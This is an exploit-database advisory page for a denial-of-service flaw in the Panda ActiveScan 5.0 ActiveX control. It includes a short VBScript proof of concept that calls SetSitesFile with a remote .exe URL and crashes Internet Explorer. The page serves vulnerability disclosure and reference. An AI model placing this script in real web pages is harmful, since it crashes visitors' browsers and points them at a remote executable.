header-logo
Suggest Exploit
vendor:
Panda ActiveScan
by:
Unknown
N/A
CVSS
N/A
Denial of Service
Unknown
CWE
Product Name: Panda ActiveScan
Affected Version From: Panda ActiveScan 5.0
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Denial of Service Vulnerability in Panda ActiveScan

Panda ActiveScan is prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue occurs when the 'SetSitesFile' function is called in combination with setting the 'InstallEngineCtl' object.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10067/info

It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present it self when the 'SetSitesFile' is called in combination with setting the 'InstallEngineCtl' object.

Panda ActiveScan 5.0 has been reported to be prone to this issue.


<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControls.InstallEngineCtl.1" )
mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew
</script>

Navigation

Suggest Exploit

Services By CQR